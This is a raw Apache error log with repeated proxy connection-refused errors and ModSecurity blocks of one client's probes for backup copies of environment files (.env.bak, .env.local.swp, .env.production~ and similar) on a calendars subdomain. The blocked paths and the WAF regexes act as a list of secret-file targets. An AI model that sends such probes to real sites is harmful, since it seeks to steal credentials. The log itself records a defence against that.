[Tue May 26 14:39:58.116978 2026] [proxy:error] [pid 626747:tid 626975] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.117044 2026] [proxy_http:error] [pid 626747:tid 626975] [client 208.84.100.238:56120] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.117146 2026] [proxy:error] [pid 626747:tid 626934] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.117188 2026] [proxy_http:error] [pid 626747:tid 626934] [client 208.84.100.238:56150] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.118903 2026] [proxy:error] [pid 626747:tid 626930] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.118955 2026] [proxy_http:error] [pid 626747:tid 626930] [client 208.84.100.238:56166] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.119059 2026] [proxy:error] [pid 626747:tid 626961] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.119101 2026] [proxy_http:error] [pid 626747:tid 626961] [client 208.84.100.238:56018] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.119208 2026] [proxy:error] [pid 626747:tid 626944] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.119248 2026] [proxy_http:error] [pid 626747:tid 626944] [client 208.84.100.238:56030] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.119371 2026] [proxy:error] [pid 626747:tid 626932] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.119423 2026] [proxy_http:error] [pid 626747:tid 626932] [client 208.84.100.238:56084] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.119544 2026] [proxy:error] [pid 626747:tid 626991] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.119587 2026] [proxy_http:error] [pid 626747:tid 626991] [client 208.84.100.238:56186] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.119709 2026] [proxy:error] [pid 626747:tid 626961] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.119758 2026] [proxy_http:error] [pid 626747:tid 626961] [client 208.84.100.238:56018] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.119852 2026] [proxy:error] [pid 626747:tid 626955] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.119892 2026] [proxy_http:error] [pid 626747:tid 626955] [client 208.84.100.238:56072] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.120066 2026] [proxy:error] [pid 626747:tid 626908] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.120116 2026] [proxy_http:error] [pid 626747:tid 626908] [client 208.84.100.238:56070] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.120231 2026] [proxy:error] [pid 626747:tid 627000] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.120285 2026] [proxy_http:error] [pid 626747:tid 627000] [client 208.84.100.238:56094] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.120504 2026] [proxy:error] [pid 626747:tid 626955] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.120572 2026] [proxy_http:error] [pid 626747:tid 626955] [client 208.84.100.238:56072] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.120739 2026] [proxy:error] [pid 626747:tid 626879] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.120812 2026] [proxy_http:error] [pid 626747:tid 626879] [client 208.84.100.238:56126] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.120908 2026] [proxy:error] [pid 626747:tid 626886] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.120948 2026] [proxy_http:error] [pid 626747:tid 626886] [client 208.84.100.238:56190] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.121050 2026] [proxy:error] [pid 626747:tid 626908] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.121097 2026] [proxy_http:error] [pid 626747:tid 626908] [client 208.84.100.238:56070] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.121201 2026] [proxy:error] [pid 626747:tid 626973] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.121266 2026] [proxy_http:error] [pid 626747:tid 626973] [client 208.84.100.238:56202] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.121385 2026] [proxy:error] [pid 626747:tid 626940] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.121440 2026] [proxy_http:error] [pid 626747:tid 626940] [client 208.84.100.238:56142] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.121534 2026] [proxy:error] [pid 626747:tid 626975] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.121572 2026] [proxy_http:error] [pid 626747:tid 626975] [client 208.84.100.238:56120] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.121689 2026] [proxy:error] [pid 626747:tid 626933] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.121739 2026] [proxy_http:error] [pid 626747:tid 626933] [client 208.84.100.238:56248] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.121829 2026] [proxy:error] [pid 626747:tid 626934] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.121868 2026] [proxy_http:error] [pid 626747:tid 626934] [client 208.84.100.238:56150] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.121986 2026] [proxy:error] [pid 626747:tid 626990] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.122030 2026] [proxy_http:error] [pid 626747:tid 626990] [client 208.84.100.238:56222] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.122266 2026] [proxy:error] [pid 626747:tid 626879] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.122327 2026] [proxy_http:error] [pid 626747:tid 626879] [client 208.84.100.238:56126] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.122422 2026] [proxy:error] [pid 626747:tid 626930] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.122462 2026] [proxy_http:error] [pid 626747:tid 626930] [client 208.84.100.238:56166] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.122556 2026] [proxy:error] [pid 626747:tid 626969] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.122599 2026] [proxy_http:error] [pid 626747:tid 626969] [client 208.84.100.238:56232] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.122703 2026] [proxy:error] [pid 626747:tid 626944] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.122744 2026] [proxy_http:error] [pid 626747:tid 626944] [client 208.84.100.238:56030] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.123001 2026] [proxy:error] [pid 626747:tid 626976] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.123068 2026] [proxy_http:error] [pid 626747:tid 626976] [client 208.84.100.238:56160] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.123150 2026] [proxy:error] [pid 626747:tid 626982] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.123211 2026] [proxy_http:error] [pid 626747:tid 626982] [client 208.84.100.238:56208] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.123297 2026] [proxy:error] [pid 626747:tid 626983] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.123333 2026] [proxy_http:error] [pid 626747:tid 626983] [client 208.84.100.238:56264] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.123456 2026] [proxy:error] [pid 626747:tid 626950] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.123508 2026] [proxy_http:error] [pid 626747:tid 626950] [client 208.84.100.238:56236] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.123611 2026] [proxy:error] [pid 626747:tid 626895] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.123666 2026] [proxy_http:error] [pid 626747:tid 626895] [client 208.84.100.238:56268] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.123837 2026] [proxy:error] [pid 626747:tid 626982] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.123871 2026] [proxy_http:error] [pid 626747:tid 626982] [client 208.84.100.238:56208] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.123958 2026] [proxy:error] [pid 626747:tid 626983] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.123995 2026] [proxy_http:error] [pid 626747:tid 626983] [client 208.84.100.238:56264] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.124057 2026] [proxy:error] [pid 626747:tid 626886] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.124083 2026] [proxy_http:error] [pid 626747:tid 626886] [client 208.84.100.238:56190] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.124172 2026] [proxy:error] [pid 626747:tid 626973] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.124222 2026] [proxy_http:error] [pid 626747:tid 626973] [client 208.84.100.238:56202] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.124328 2026] [proxy:error] [pid 626747:tid 626940] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.124377 2026] [proxy_http:error] [pid 626747:tid 626940] [client 208.84.100.238:56142] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.124475 2026] [proxy:error] [pid 626747:tid 626933] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.124520 2026] [proxy_http:error] [pid 626747:tid 626933] [client 208.84.100.238:56248] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.124613 2026] [proxy:error] [pid 626747:tid 626990] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.124659 2026] [proxy_http:error] [pid 626747:tid 626990] [client 208.84.100.238:56222] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.124846 2026] [proxy:error] [pid 626747:tid 626998] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.124875 2026] [proxy_http:error] [pid 626747:tid 626998] [client 208.84.100.238:56188] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.124995 2026] [proxy:error] [pid 626747:tid 626918] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.125065 2026] [proxy_http:error] [pid 626747:tid 626918] [client 208.84.100.238:56280] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.125159 2026] [proxy:error] [pid 626747:tid 626969] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.125201 2026] [proxy_http:error] [pid 626747:tid 626969] [client 208.84.100.238:56232] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.125390 2026] [proxy:error] [pid 626747:tid 626963] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.125430 2026] [proxy_http:error] [pid 626747:tid 626963] [client 208.84.100.238:56172] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.125542 2026] [proxy:error] [pid 626747:tid 627000] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.125590 2026] [proxy_http:error] [pid 626747:tid 627000] [client 208.84.100.238:56094] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.125679 2026] [proxy:error] [pid 626747:tid 626895] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.125714 2026] [proxy_http:error] [pid 626747:tid 626895] [client 208.84.100.238:56268] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.125876 2026] [proxy:error] [pid 626747:tid 626898] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.125954 2026] [proxy_http:error] [pid 626747:tid 626898] [client 208.84.100.238:56006] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.126075 2026] [proxy:error] [pid 626747:tid 626950] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.126126 2026] [proxy_http:error] [pid 626747:tid 626950] [client 208.84.100.238:56236] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.126372 2026] [proxy:error] [pid 626747:tid 626918] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.126434 2026] [proxy_http:error] [pid 626747:tid 626918] [client 208.84.100.238:56280] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.126571 2026] [proxy:error] [pid 626747:tid 626898] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.126607 2026] [proxy_http:error] [pid 626747:tid 626898] [client 208.84.100.238:56006] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.126702 2026] [proxy:error] [pid 626747:tid 626998] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.126739 2026] [proxy_http:error] [pid 626747:tid 626998] [client 208.84.100.238:56188] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.126851 2026] [proxy:error] [pid 626747:tid 626981] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.126902 2026] [proxy_http:error] [pid 626747:tid 626981] [client 208.84.100.238:56108] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.127033 2026] [proxy:error] [pid 626747:tid 626976] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.127098 2026] [proxy_http:error] [pid 626747:tid 626976] [client 208.84.100.238:56160] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.436307 2026] [proxy:error] [pid 626747:tid 626928] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.436368 2026] [proxy_http:error] [pid 626747:tid 626928] [client 208.84.100.238:56050] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.436970 2026] [proxy:error] [pid 626747:tid 626928] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.437001 2026] [proxy_http:error] [pid 626747:tid 626928] [client 208.84.100.238:56050] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.660304 2026] [security2:error] [pid 626747:tid 626924] [client 208.84.100.238:56012] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.copy"] [unique_id "ahVjZhVF8Qmdmw_OMfIOUgAAATk"]
[Tue May 26 14:39:58.661307 2026] [proxy:error] [pid 626747:tid 626959] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.661356 2026] [proxy_http:error] [pid 626747:tid 626959] [client 208.84.100.238:56038] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.661936 2026] [proxy:error] [pid 626747:tid 626959] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.661977 2026] [proxy_http:error] [pid 626747:tid 626959] [client 208.84.100.238:56038] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.662577 2026] [proxy:error] [pid 626747:tid 626941] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.662648 2026] [proxy_http:error] [pid 626747:tid 626941] [client 208.84.100.238:56054] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.663210 2026] [proxy:error] [pid 626747:tid 626941] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.663237 2026] [proxy_http:error] [pid 626747:tid 626941] [client 208.84.100.238:56054] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.862505 2026] [security2:error] [pid 626747:tid 626938] [client 208.84.100.238:56402] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.backup"] [unique_id "ahVjZhVF8Qmdmw_OMfIOXwAAAUc"]
[Tue May 26 14:39:58.862534 2026] [security2:error] [pid 626747:tid 626899] [client 208.84.100.238:56400] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.old"] [unique_id "ahVjZhVF8Qmdmw_OMfIOYAAAASA"]
[Tue May 26 14:39:58.862540 2026] [security2:error] [pid 626747:tid 626964] [client 208.84.100.238:56456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.backup"] [unique_id "ahVjZhVF8Qmdmw_OMfIOXgAAAWE"]
[Tue May 26 14:39:58.862579 2026] [security2:error] [pid 626747:tid 626944] [client 208.84.100.238:56428] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.swp"] [unique_id "ahVjZhVF8Qmdmw_OMfIOYgAAAU0"]
[Tue May 26 14:39:58.862666 2026] [security2:error] [pid 626747:tid 626932] [client 208.84.100.238:56438] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.orig"] [unique_id "ahVjZhVF8Qmdmw_OMfIOZAAAAUE"]
[Tue May 26 14:39:58.862844 2026] [security2:error] [pid 626747:tid 626891] [client 208.84.100.238:56350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env~"] [unique_id "ahVjZhVF8Qmdmw_OMfIOWQAAARg"]
[Tue May 26 14:39:58.862864 2026] [security2:error] [pid 626747:tid 626991] [client 208.84.100.238:56482] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production~"] [unique_id "ahVjZhVF8Qmdmw_OMfIOZQAAAXw"]
[Tue May 26 14:39:58.863283 2026] [security2:error] [pid 626747:tid 626902] [client 208.84.100.238:56390] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.bak"] [unique_id "ahVjZhVF8Qmdmw_OMfIOZwAAASM"]
[Tue May 26 14:39:58.863305 2026] [proxy:error] [pid 626747:tid 627003] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.863356 2026] [proxy_http:error] [pid 626747:tid 627003] [client 208.84.100.238:56412] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.863495 2026] [security2:error] [pid 626747:tid 626957] [client 208.84.100.238:56440] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.copy"] [unique_id "ahVjZhVF8Qmdmw_OMfIOWgAAAVo"]
[Tue May 26 14:39:58.863742 2026] [proxy:error] [pid 626747:tid 626931] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.863816 2026] [proxy_http:error] [pid 626747:tid 626931] [client 208.84.100.238:56470] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.863975 2026] [proxy:error] [pid 626747:tid 627003] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.864010 2026] [proxy_http:error] [pid 626747:tid 627003] [client 208.84.100.238:56412] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.864043 2026] [security2:error] [pid 626747:tid 626940] [client 208.84.100.238:56320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.bak"] [unique_id "ahVjZhVF8Qmdmw_OMfIOawAAAUk"]
[Tue May 26 14:39:58.864079 2026] [security2:error] [pid 626747:tid 626908] [client 208.84.100.238:56444] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.old"] [unique_id "ahVjZhVF8Qmdmw_OMfIOaAAAASk"]
[Tue May 26 14:39:58.864487 2026] [proxy:error] [pid 626747:tid 626899] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.864522 2026] [proxy_http:error] [pid 626747:tid 626899] [client 208.84.100.238:56314] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.864563 2026] [security2:error] [pid 626747:tid 626912] [client 208.84.100.238:56494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.orig"] [unique_id "ahVjZhVF8Qmdmw_OMfIOXAAAAS0"]
[Tue May 26 14:39:58.864682 2026] [proxy:error] [pid 626747:tid 626975] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.864741 2026] [proxy_http:error] [pid 626747:tid 626975] [client 208.84.100.238:56338] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.864851 2026] [proxy:error] [pid 626747:tid 626931] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
